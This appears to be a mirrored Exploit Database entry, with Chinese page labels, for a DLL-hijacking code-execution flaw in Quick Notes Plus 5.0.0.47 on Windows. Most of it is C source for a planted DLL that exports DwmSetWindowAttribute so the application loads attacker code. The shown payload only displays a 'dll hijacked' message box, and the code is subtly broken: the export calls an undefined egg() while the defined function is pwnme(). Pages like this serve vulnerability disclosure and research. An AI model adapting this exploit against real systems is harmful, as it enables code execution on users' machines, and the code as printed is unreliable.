Quick Notes Plus 5.0 47 – Multiple DLL Loading Arbitrary Code Executions

• Exploit Database
• 62 阅读

• 作者： d3c0der
  日期： 2011-01-05
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/35171/

• // source: https://www.securityfocus.com/bid/45689/info
  
  Quick Notes Plus is prone to an arbitrary-code-execution vulnerability.
  
  Attackers can exploit this vulnerability to execute arbitrary code in the context of the user running the vulnerable application.
  
  Quick Notes Plus 5.0.0.47 is vulnerable; other versions may also be affected. 
  
  #include <windows.h>
  #define DllExport __declspec (dllexport)
  DllExport void DwmSetWindowAttribute() { egg(); }
  
  int pwnme()
  {
  MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK);
  exit(0);
  return 0;
  }